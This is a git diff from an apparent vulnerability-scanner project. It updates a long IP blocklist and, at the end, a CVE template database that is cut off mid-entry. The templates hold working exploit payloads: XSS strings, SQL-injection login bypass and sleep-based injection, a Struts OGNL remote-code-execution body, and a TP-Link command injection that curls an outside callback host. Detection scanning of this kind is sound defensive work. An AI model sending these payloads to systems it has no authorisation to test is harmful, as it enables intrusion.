-77.239.213.22
+77.107.47.8
+77.109.32.245
+77.16.217.22
+77.239.213.16
 77.243.181.54
+77.244.76.98
 77.32.67.106
-77.32.75.126
-77.37.135.17
-77.37.248.144
+77.37.168.42
 77.44.110.101
-77.51.179.130
-77.51.187.149
-77.53.91.200
+77.52.19.44
 77.54.54.54
-77.65.168.51
-77.77.222.24
-77.81.19.101
-77.82.90.210
-77.83.36.23
 77.90.185.120
-77.90.185.131
-77.90.185.150
 77.90.185.151
 77.90.185.160
 77.90.185.161
@@ -9285,289 +9252,316 @@
 77.90.185.71
 77.90.185.90
 77.91.70.173
-77.91.86.251
-78.108.177.52
+77.91.70.177
+77.91.70.196
+77.91.70.25
+77.91.78.115
+77.91.84.54
+78.108.177.51
+78.108.177.54
+78.111.249.76
 78.128.112.58
-78.128.112.6
-78.128.113.250
-78.128.113.78
+78.128.113.34
 78.128.113.94
 78.128.114.66
 78.128.114.90
 78.133.27.130
 78.134.38.138
-78.134.72.23
-78.142.55.100
-78.153.139.4
-78.187.145.101
+78.135.67.6
+78.135.77.132
+78.186.153.90
 78.187.21.105
+78.187.38.148
 78.188.31.103
-78.188.33.220
-78.188.54.2
-78.192.56.254
-78.22.165.78
-78.36.74.231
-78.37.42.29
-78.43.15.142
-78.72.103.169
-78.72.156.126
+78.24.223.152
 78.72.235.218
-78.89.152.189
+78.89.152.10
 78.89.152.190
-78.89.152.191
-78.89.153.49
 78.89.186.203
-79.110.48.113
-79.110.48.150
-79.110.48.16
-79.110.48.24
-79.110.48.30
+78.94.232.255
+79.104.0.82
+79.110.48.241
+79.110.48.32
 79.110.62.106
-79.110.62.122
-79.110.62.163
 79.110.62.39
 79.110.62.66
+79.110.62.68
+79.111.0.58
 79.116.2.222
-79.116.39.48
-79.124.49.234
 79.124.58.130
-79.124.58.222
+79.124.58.218
 79.124.58.78
 79.124.59.86
 79.124.62.130
-79.124.62.59
 79.124.62.62
-79.124.62.78
 79.124.62.82
 79.124.62.86
+79.124.8.3
 79.127.126.13
-79.132.125.226
-79.136.112.163
+79.129.204.181
+79.129.29.237
 79.136.18.158
 79.137.192.15
-79.137.195.103
-79.137.34.148
+79.137.196.237
+79.137.202.87
+79.137.203.212
+79.137.203.226
+79.137.229.66
+79.137.24.1
 79.137.35.194
-79.137.65.46
-79.3.94.201
-79.46.255.160
-79.47.252.22
-79.49.54.177
-79.59.123.94
-8.130.119.170
-8.134.87.215
-8.142.111.3
-8.142.168.93
-8.142.178.141
-8.20.22.58
-8.208.81.165
-8.208.82.59
-8.209.254.176
+79.140.22.146
+79.153.8.173
+79.17.237.17
+79.175.160.120
+79.175.172.61
+79.224.102.73
+79.45.238.221
+79.51.69.103
+79.6.222.21
+79.7.186.65
+79.79.24.23
+8.129.212.192
+8.130.43.152
+8.130.83.242
+8.134.206.129
+8.208.21.180
+8.208.25.255
+8.209.218.167
+8.209.240.18
 8.209.68.21
-8.209.69.51
-8.209.75.51
-8.209.98.48
-8.210.123.17
+8.210.134.241
 8.210.161.5
-8.211.195.160
-8.213.130.78
-8.217.108.150
-8.217.111.169
-8.217.118.248
+8.210.228.83
+8.213.198.174
+8.213.21.92
+8.217.122.113
+8.217.127.212
 8.217.82.244
-8.218.153.74
-8.218.163.73
-8.218.191.114
-8.219.12.72
+8.218.100.154
+8.218.157.128
+8.218.97.250
+8.219.11.76
+8.219.137.112
 8.219.187.201
-8.219.199.122
 8.219.248.223
+8.219.249.119
+8.222.154.105
+8.222.157.97
 8.222.166.246
 8.222.169.239
-8.222.190.17
-8.222.199.27
-8.222.213.249
-8.222.222.219
 8.222.223.231
-8.245.7.99
+8.222.253.90
+8.242.172.195
 8.27.116.24
 80.120.241.118
-80.122.5.206
-80.13.115.162
-80.15.146.222
+80.14.116.214
 80.15.182.191
-80.158.78.95
-80.209.140.213
+80.153.184.201
+80.179.114.175
+80.19.204.177
+80.191.90.136
 80.227.102.242
-80.227.147.94
-80.227.99.162
-80.233.12.98
-80.240.206.22
+80.227.107.250
 80.240.206.87
-80.254.124.230
-80.41.206.73
-80.53.153.185
-80.58.143.80
-80.66.76.80
+80.249.113.12
+80.251.210.73
+80.251.216.10
+80.253.31.232
+80.51.121.72
+80.65.211.99
 80.66.83.145
 80.66.83.150
 80.66.83.171
 80.66.83.184
-80.66.83.207
 80.66.83.52
 80.66.83.77
 80.66.83.88
+80.66.88.215
 80.68.7.179
-80.72.24.105
 80.73.67.6
 80.76.51.163
-80.76.51.241
-80.76.51.39
+80.76.51.235
+80.76.51.34
 80.76.51.41
+80.76.51.68
+80.80.218.227
 80.82.70.133
 80.82.77.139
 80.82.77.202
 80.82.77.33
-80.94.248.11
+80.91.91.122
 80.94.92.16
 80.94.92.31
+80.94.92.35
 80.94.95.181
 80.94.95.184
 80.94.95.249
 81.0.218.249
-81.107.16.24
 81.13.62.77
 81.136.201.30
 81.150.154.228
 81.16.165.33
-81.161.229.100
+81.161.229.85
 81.168.101.105
 81.17.18.98
-81.17.22.115
 81.17.25.50
-81.172.201.241
+81.177.143.135
+81.182.253.185
 81.19.137.236
+81.192.114.31
 81.192.46.38
-81.203.238.20
-81.214.39.81
-81.223.232.24
+81.192.46.45
+81.192.46.48
+81.218.45.149
+81.22.51.64
+81.23.8.230
 81.231.241.25
-81.246.47.178
 81.246.65.159
 81.26.201.8
-81.31.170.17
+81.28.167.30
 81.33.139.79
-81.4.110.216
-81.47.160.154
-81.69.171.79
-81.69.244.171
-81.69.4.61
-81.69.40.180
-81.70.167.134
-81.70.2.239
-81.70.203.89
-81.70.219.136
-81.70.6.172
-81.86.212.0
+81.68.182.134
+81.69.15.56
+81.69.174.130
+81.69.174.207
+81.69.253.136
+81.7.10.216
+81.70.157.183
+81.70.167.182
+81.70.195.6
+81.70.27.30
+81.70.79.78
+81.71.162.50
+81.71.25.27
+81.89.110.244
 81.89.79.166
-81.90.228.187
-81.91.159.110
-82.100.220.97
+82.102.12.37
 82.102.147.36
 82.102.149.88
 82.102.150.81
 82.102.153.227
-82.111.224.128
-82.111.224.129
-82.117.199.206
-82.127.219.71
-82.129.226.42
-82.143.154.104
+82.129.224.250
+82.142.155.158
+82.146.43.28
 82.147.85.78
 82.147.85.79
-82.153.21.60
-82.156.123.122
+82.152.155.152
+82.152.35.113
+82.155.45.55
+82.156.136.160
 82.156.158.249
-82.156.161.165
-82.156.235.34
+82.156.169.242
+82.156.179.204
+82.156.3.162
+82.156.65.21
+82.156.88.83
 82.157.140.231
 82.157.156.116
 82.157.21.149
-82.157.247.129
-82.157.70.56
+82.157.234.17
+82.162.69.205
 82.165.110.236
-82.18.163.228
-82.214.118.45
-82.64.186.234
-82.64.9.81
-82.65.162.93
+82.165.177.3
+82.165.184.76
+82.180.162.30
+82.199.96.194
+82.200.197.100
+82.200.226.226
+82.200.65.218
+82.207.8.154
+82.207.8.170
+82.207.8.206
+82.207.8.218
+82.207.8.242
+82.207.9.150
+82.221.136.1
+82.64.174.9
+82.64.200.188
+82.65.135.40
+82.65.17.52
 82.65.197.203
 82.65.34.213
-82.66.143.175
-82.66.188.48
-82.66.252.172
-82.66.59.170
+82.65.43.136
+82.66.147.134
+82.67.7.178
 82.80.138.20
-83.136.176.12
-83.143.246.30
-83.150.215.253
-83.188.240.220
+83.1.243.138
+83.132.152.161
+83.16.184.66
+83.18.228.234
 83.209.107.31
 83.209.225.143
-83.221.176.86
-83.228.105.85
-83.233.86.147
+83.235.16.111
 83.239.204.140
-83.239.84.130
+83.239.97.132
+83.240.178.154
 83.251.201.70
-83.50.46.86
+83.253.194.67
+83.255.11.155
+83.48.97.248
 83.61.0.145
+83.8.84.247
 83.97.73.87
+84.0.253.152
+84.108.40.27
 84.121.129.27
-84.17.61.194
+84.2.226.70
 84.201.158.231
-84.212.213.35
-84.221.96.49
-84.228.10.170
+84.201.158.33
+84.201.173.228
 84.235.46.149
-84.240.224.102
-84.240.42.68
-84.241.63.224
+84.238.27.103
+84.242.124.74
 84.243.238.30
 84.252.143.78
+84.255.255.182
 84.42.20.248
+84.42.28.190
 84.42.70.218
+84.52.103.234
+84.54.115.46
+84.54.13.68
+84.54.50.61
+84.54.51.111
 84.54.51.121
-84.54.51.219
 84.54.51.252
 84.54.51.4
-84.54.51.99
-84.60.190.220
-85.105.158.34
+84.54.51.79
 85.112.78.163
-85.114.119.22
 85.114.138.220
-85.15.190.226
-85.152.30.138
-85.158.32.13
-85.159.163.143
+85.119.122.23
+85.133.218.131
+85.140.31.119
+85.152.57.60
+85.159.212.19
 85.172.106.202
-85.185.201.10
-85.185.64.219
-85.185.75.98
-85.191.156.88
-85.192.41.110
+85.172.189.189
+85.18.236.229
+85.185.85.194
 85.192.41.225
-85.195.28.115
-85.204.107.62
+85.192.41.240
+85.208.253.133
+85.208.253.160
+85.208.253.165
+85.208.253.191
+85.208.253.195
+85.208.253.204
+85.208.253.207
+85.208.253.209
+85.208.253.242
+85.208.253.249
+85.208.253.42
+85.208.253.83
+85.208.96.193
+85.208.96.194
 85.208.96.195
-85.208.96.196
 85.208.96.197
 85.208.96.198
 85.208.96.199
 85.208.96.200
 85.208.96.201
 85.208.96.202
+85.208.96.203
 85.208.96.204
 85.208.96.206
 85.208.96.207
@@ -9576,219 +9570,243 @@
 85.208.96.210
 85.208.96.212
 85.209.11.117
-85.209.176.33
-85.215.162.179
-85.227.85.186
+85.209.11.68
 85.227.85.29
-85.237.40.115
+85.234.116.19
+85.236.165.2
 85.237.55.203
-85.237.55.233
 85.237.57.200
-85.24.197.232
-85.244.137.121
-85.26.136.53
+85.24.168.235
+85.240.175.100
+85.240.58.125
+85.247.2.222
+85.252.40.48
+85.31.45.3
 85.31.45.30
 85.31.45.34
-85.31.45.37
+85.31.45.40
 85.31.45.41
+85.50.246.66
 85.51.217.156
 85.51.24.68
-85.67.60.35
-85.69.178.104
-86.105.9.67
-86.57.153.252
-86.57.183.121
-86.57.218.140
-86.57.232.71
-86.9.201.96
-86.99.116.206
+85.73.186.112
+85.99.120.26
 87.103.126.54
-87.103.192.129
+87.103.175.140
+87.106.197.31
+87.107.188.253
 87.107.71.44
 87.120.84.117
-87.120.84.147
-87.120.84.179
-87.120.84.185
-87.120.84.232
-87.120.84.72
-87.121.69.247
-87.126.166.109
-87.19.162.76
-87.197.155.226
+87.120.84.118
+87.120.84.168
+87.120.84.96
+87.121.113.204
+87.121.113.237
+87.121.221.210
+87.134.124.185
+87.219.167.20
+87.219.167.80
 87.229.211.28
-87.233.83.87
-87.236.176.115
-87.236.176.122
-87.236.176.157
-87.236.176.180
-87.236.176.189
-87.236.176.194
-87.236.176.218
-87.236.176.227
-87.236.176.247
+87.229.214.186
+87.236.176.100
+87.236.176.104
+87.236.176.137
+87.236.176.159
+87.236.176.170
+87.236.176.19
+87.236.176.209
+87.236.176.23
+87.236.176.31
 87.236.176.39
-87.236.176.45
+87.236.176.42
+87.236.176.43
+87.236.176.44
 87.236.176.46
-87.236.176.50
+87.236.176.47
+87.236.176.48
+87.236.176.49
+87.236.176.54
+87.236.176.55
+87.236.176.56
 87.236.176.60
 87.236.176.63
-87.236.176.75
-87.236.176.78
-87.236.176.88
-87.236.176.96
+87.236.176.66
+87.236.176.70
+87.236.176.71
+87.236.176.8
 87.237.117.183
-87.247.251.224
+87.245.17.229
+87.248.226.146
+87.249.117.67
 87.249.164.87
-87.251.75.120
+87.251.236.115
 87.255.193.50
-87.27.125.158
-87.63.90.211
-87.79.93.10
+87.27.205.141
+87.27.214.5
+87.98.171.138
 87.98.190.245
 88.117.175.44
-88.149.198.156
-88.152.51.106
+88.129.114.143
+88.129.241.56
+88.149.253.172
 88.153.28.166
+88.156.40.50
 88.166.109.155
 88.168.61.98
-88.198.56.78
+88.18.207.199
+88.198.163.195
 88.201.229.78
 88.204.200.110
-88.208.199.230
 88.214.25.16
-88.214.26.53
-88.215.1.180
-88.215.37.156
-88.247.94.61
-88.248.22.194
-88.250.225.126
-88.250.66.14
+88.218.248.140
+88.30.4.209
+88.40.108.34
+88.87.89.202
 88.88.123.168
-88.91.166.59
-89.101.218.218
+89.10.150.58
 89.106.199.150
-89.117.76.39
-89.151.131.47
-89.151.147.163
-89.154.149.226
-89.163.131.32
-89.165.51.153
-89.169.27.207
-89.178.57.150
-89.181.49.183
+89.11.150.231
+89.175.49.2
+89.179.126.155
+89.185.85.133
 89.186.10.225
+89.187.163.203
 89.187.41.22
 89.190.156.139
+89.190.156.144
 89.190.156.161
+89.190.156.167
 89.190.156.175
 89.190.156.176
-89.213.12.237
-89.216.99.6
-89.218.118.22
+89.208.104.119
+89.208.105.228
+89.208.107.198
+89.208.246.109
+89.217.57.79
 89.218.185.66
-89.231.160.49
-89.235.98.238
-89.236.35.110
-89.236.35.116
-89.248.163.113
+89.22.185.202
+89.22.187.150
+89.232.156.150
+89.234.218.16
+89.234.218.17
+89.236.239.25
+89.248.163.130
 89.248.163.16
 89.248.163.200
-89.248.163.214
-89.248.163.216
 89.248.163.245
-89.248.165.102
+89.248.165.100
 89.248.165.14
 89.248.165.154
+89.248.165.163
+89.248.165.167
+89.248.165.2
 89.248.165.214
-89.248.165.245
 89.248.165.30
 89.248.165.35
 89.248.165.45
+89.248.165.51
+89.248.165.81
 89.248.165.85
 89.248.165.99
 89.248.168.42
 89.248.170.88
 89.248.172.16
 89.249.62.54
-89.252.140.220
-89.37.116.197
-89.37.116.199
-89.37.116.200
-89.40.227.242
-89.40.66.22
-89.44.137.55
-90.141.55.225
+89.251.47.179
+89.252.140.21
+89.39.117.111
+89.97.218.142
 90.144.94.63
-90.151.171.106
+90.150.180.78
+90.160.139.163
 90.161.217.228
+90.168.201.25
+90.175.126.120
+90.180.120.160
+90.183.24.74
+90.187.219.149
 90.187.71.173
-90.188.225.36
-90.188.5.39
-90.226.188.180
-90.95.152.193
-91.109.201.183
-91.116.250.75
-91.121.171.183
-91.122.197.131
-91.130.46.174
-91.130.59.242
+90.188.41.224
+90.228.236.68
+91.105.196.58
+91.122.105.209
+91.122.197.235
 91.134.0.189
-91.135.108.160
-91.147.205.201
-91.165.131.14
-91.191.209.138
+91.138.255.151
+91.144.143.87
+91.144.158.231
+91.144.20.198
+91.151.95.249
+91.185.28.60
+91.185.41.32
+91.189.183.213
 91.191.209.198
 91.191.209.222
-91.193.236.146
+91.191.209.26
+91.193.129.151
+91.193.43.11
+91.194.247.22
 91.200.103.65
 91.204.139.118
+91.205.219.185
 91.206.32.120
-91.207.175.154
+91.213.99.15
+91.213.99.45
 91.218.114.197
-91.218.160.238
-91.219.239.166
+91.219.236.137
+91.219.236.58
+91.219.58.218
+91.221.246.6
+91.222.237.94
 91.223.169.83
 91.223.169.88
-91.225.158.77
-91.225.161.67
-91.227.28.137
+91.226.239.230
+91.227.18.33
+91.232.120.102
 91.233.145.131
 91.233.146.18
-91.238.230.148
+91.234.183.157
+91.236.168.249
+91.237.161.246
 91.238.69.91
-91.238.99.217
 91.239.97.29
-91.240.118.221
-91.240.118.224
-91.240.118.29
-91.240.118.71
-91.240.118.75
-91.240.118.77
 91.241.150.246
-91.249.204.194
+91.244.113.156
+91.244.113.188
+91.245.12.23
+91.250.81.179
 91.73.195.46
-91.73.247.158
 91.74.104.250
+91.74.46.197
 91.75.98.209
+91.84.54.13
 91.84.54.25
-91.92.209.224
+91.89.132.171
+91.93.63.184
 91.98.119.127
+92.100.159.115
 92.118.39.246
-92.130.200.241
-92.189.249.35
-92.204.139.216
-92.204.236.195
-92.207.87.166
-92.223.85.254
-92.241.106.38
-92.253.125.106
+92.118.39.34
+92.118.39.44
+92.118.39.98
+92.204.139.118
+92.205.18.100
+92.205.24.196
+92.205.29.126
+92.207.68.236
+92.222.10.235
+92.222.180.245
+92.222.202.39
+92.222.24.76
+92.222.84.195
+92.223.85.69
+92.241.68.2
+92.255.195.59
 92.255.197.15
-92.33.255.49
 92.35.121.47
-92.54.15.116
-92.58.124.33
-92.63.196.167
-92.63.196.27
+92.46.41.208
+92.50.249.166
+92.51.70.138
 92.63.197.110
 92.63.197.153
 92.63.197.157
@@ -9799,41 +9817,42 @@
 92.63.197.92
 92.63.197.93
 92.63.197.97
-92.68.206.76
-93.107.1.136
+92.91.104.54
+93.108.242.140
+93.113.233.59
 93.115.79.88
-93.121.189.54
+93.120.240.202
 93.123.118.123
 93.123.118.22
 93.123.118.23
-93.123.240.243
-93.127.45.76
-93.157.156.173
+93.149.118.114
+93.149.14.173
+93.150.21.150
+93.157.174.208
 93.174.95.106
 93.179.113.144
 93.179.90.168
-93.187.32.42
-93.190.23.126
-93.38.112.165
+93.185.73.178
+93.188.166.161
+93.189.11.246
+93.190.106.139
+93.39.187.113
+93.42.155.2
+93.43.231.181
+93.45.45.246
 93.46.198.114
+93.51.40.113
+93.51.73.137
 93.54.119.48
-93.55.193.176
 93.62.72.229
-93.74.167.4
-93.80.242.227
-93.86.60.227
-94.100.96.42
-94.100.96.60
-94.100.99.195
+93.63.6.20
+93.83.192.174
 94.102.49.190
 94.102.49.193
-94.102.50.103
-94.102.61.10
 94.102.61.2
 94.102.61.20
-94.102.61.22
+94.102.61.23
 94.102.61.25
-94.102.61.26
 94.102.61.27
 94.102.61.28
 94.102.61.29
@@ -9847,154 +9866,135 @@
 94.102.61.40
 94.102.61.41
 94.102.61.42
+94.102.61.43
 94.102.61.44
 94.102.61.45
 94.102.61.46
 94.102.61.47
-94.102.61.48
 94.102.61.49
 94.102.61.5
 94.102.61.50
-94.102.61.52
 94.102.61.53
 94.102.61.54
 94.102.61.6
-94.102.61.80
-94.127.215.194
-94.131.132.139
-94.136.74.132
-94.137.163.76
+94.103.124.253
+94.103.124.62
+94.127.212.198
+94.131.211.168
+94.132.216.200
+94.139.201.162
+94.141.243.141
+94.141.69.156
 94.142.138.104
 94.143.43.112
 94.156.102.101
 94.156.102.111
 94.156.102.120
-94.156.102.138
 94.156.102.70
 94.156.102.71
 94.156.102.72
 94.156.102.75
 94.156.102.78
 94.156.102.80
-94.156.161.181
 94.156.6.16
-94.156.6.162
-94.156.6.207
-94.156.6.215
-94.156.6.221
-94.158.121.218
-94.158.91.186
-94.20.61.166
-94.200.20.66
-94.200.80.230
+94.159.23.102
+94.16.112.177
+94.179.133.22
+94.180.247.20
+94.188.177.110
+94.20.88.210
+94.202.24.226
 94.202.37.182
-94.203.183.34
-94.205.22.95
+94.203.129.98
 94.206.167.182
-94.206.196.17
 94.206.42.182
-94.206.93.90
-94.207.109.177
-94.228.169.199
+94.206.49.146
 94.228.170.221
-94.229.79.10
-94.229.79.26
-94.232.43.50
-94.241.32.227
-94.254.12.27
-94.255.186.204
+94.23.162.147
+94.23.199.50
+94.232.42.57
+94.254.0.234
 94.26.147.56
-94.3.14.225
 94.41.0.165
+94.45.125.74
+94.45.82.11
 94.65.32.99
-94.66.67.57
-94.74.90.173
-94.76.171.9
-95.106.154.84
-95.124.251.21
-95.124.251.22
+95.111.237.28
 95.124.251.24
-95.124.251.25
-95.124.251.29
+95.124.251.28
+95.130.227.116
 95.130.227.208
-95.141.228.9
-95.142.88.195
-95.142.90.214
-95.153.109.222
-95.156.119.165
-95.165.142.8
-95.173.168.14
-95.175.16.59
+95.131.12.198
+95.152.60.122
+95.156.96.46
+95.165.89.212
+95.181.43.122
 95.182.184.68
-95.209.130.210
+95.189.105.26
 95.214.24.51
 95.214.24.77
-95.214.24.80
 95.214.24.81
-95.214.25.238
 95.214.26.102
 95.214.26.114
 95.214.26.116
 95.214.26.118
-95.214.26.146
 95.214.27.118
-95.214.27.145
-95.214.27.227
+95.214.27.197
 95.214.27.23
-95.214.27.230
-95.214.27.39
-95.214.27.5
-95.214.27.91
 95.214.53.134
 95.214.53.221
+95.214.54.82
 95.214.55.115
 95.214.55.85
-95.214.63.81
 95.215.85.19
-95.222.243.108
+95.217.242.226
+95.229.66.163
+95.229.93.114
 95.255.111.234
-95.255.138.238
 95.35.60.199
+95.42.185.92
 95.42.59.166
-95.79.30.250
-95.84.147.154
-95.85.152.95
+95.56.248.141
+95.57.207.100
+95.81.93.135
+95.84.66.169
 95.87.248.223
-95.90.157.167
-96.1.64.194
-96.1.99.139
+95.9.143.188
+95.90.246.64
 96.10.158.110
-96.116.137.60
-96.116.138.234
-96.116.140.239
+96.116.132.192
+96.116.135.9
 96.116.141.230
-96.118.149.53
-96.118.214.190
+96.118.242.231
 96.126.104.109
-96.28.202.13
-96.35.245.123
-96.40.105.49
+96.250.92.5
 96.65.211.250
 96.65.66.250
 96.67.59.65
+96.78.175.36
 96.78.175.38
-96.88.139.105
-96.88.140.153
-96.91.103.173
-97.104.65.82
+96.78.175.39
+96.78.175.42
+96.78.175.45
+96.78.57.140
+96.87.192.126
+96.87.228.250
+96.93.196.89
+97.107.133.213
 97.107.141.150
 97.65.179.126
+97.68.57.241
+97.74.83.185
+97.74.84.247
+97.74.86.61
+97.74.94.252
+97.79.236.49
 97.87.231.7
-97.92.187.203
-97.92.212.232
-98.10.121.246
-98.114.182.42
-98.116.122.26
-98.144.109.171
-98.152.165.66
+98.142.141.184
 98.235.105.236
-98.30.124.194
-98.96.193.12
+98.49.45.202
+98.96.193.11
 98.96.193.2
-99.252.90.240
-99.47.175.165
+98.96.193.4
+99.150.199.10
+99.35.132.67
diff --git a/db/cves.json b/db/cves.json
index e449b4d4..3e8497f3 100644
--- a/db/cves.json
+++ b/db/cves.json
@@ -1 +1 @@
-{"templates":[{"id":"CVE-2002-1131","info":{"name":"SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search","{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search","{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21985","info":{"name":"VMware vSphere Client (HTML5) - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"methodInput\":[{\"type\":\"ClusterComputeResource\",\"value\": null,\"serverGuid\": null}]}\n"],"matchers":[{"type":"word","part":"body","words":["{\"result\":{\"isDisconnected\":"]}]}]},{"id":"CVE-2021-43510","info":{"name":"Sourcecodester Simple Client Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin'+or+'1'%3d'1'--+-&password=as\n","GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_1, \"text/html\")","status_code_1 == 200","contains(body_1, \"{\\\"status\\\":\\\"success\\\"}\")","contains(body_2, \"Welcome to Simple Client\")"],"condition":"and"}]}]},{"id":"CVE-2021-31581","info":{"name":"Akkadian Provisioning Manager - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pme/database/pme/phinx.yml"],"matchers-condition":"and","matchers":[{"type":"word","words":["host:","name:","pass:"],"condition":"and"},{"type":"word","negative":true,"words":["html>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43062","info":{"name":"Fortinet FortiMail 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com<Svg%2Fonload%3Dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<Svg/onload=alert(document.domain)>","FortiMail Click Protection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41653","info":{"name":"TP-Link - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi?2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\nReferer: http://{{Hostname}}/mainFrame.htm\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\ndataBlockSize=64\ntimeout=1\nnumberOfRepetitions=4\nhost=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')\nX_TP_ConnName=ewan_ipoe_d\ndiagnosticsState=Requested\n","POST /cgi?7 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\nReferer: http://{{Hostname}}/mainFrame.htm\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-24838","info":{"name":"WordPress AnyComment <0.3.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh","{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh?a=https://interact.sh"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-3110","info":{"name":"PrestaShop 1.7.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"average_grade\")"],"condition":"and"}]}]},{"id":"CVE-2021-22873","info":{"name":"Revive Adserver <5.1.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ads/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/openx/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/revive/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/www/delivery/lg.php?dest=http://interact.sh"],"stop-at-first-match":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-41192","info":{"name":"Redash Setup Configuration - Default Secrets Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs","{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Enter your new password:","redash"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26710","info":{"name":"Redwood Report2Web 4.3.4.5 & 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28169","info":{"name":"Eclipse Jetty ConcatServlet - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static?/%2557EB-INF/web.xml","{{BaseURL}}/concat?/%2557EB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/xml"]},{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31805","info":{"name":"Apache Struts2 S2-062 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Length: 1095\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Disposition: form-data; name=\"id\"\n\n%{\n(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\n(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) 